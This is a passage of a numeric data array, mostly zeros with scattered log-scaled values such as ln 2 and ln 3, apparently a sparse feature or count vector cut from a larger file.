0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.70805020110221, 0.6931471805599453, 0.0, \n 0.0, 2.8398715690385097, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0, 6.437751649736401, 0.0, 0.0, 0.0, 2.0794415416798357, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 7.471502607305074, 0.0,\n 1.3862943611198906, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.6931471805599453, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.330733340286331, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.1298987149230735,\n 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.6931471805599453,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.6931471805599453, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0, 0, 1.791759469228055, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 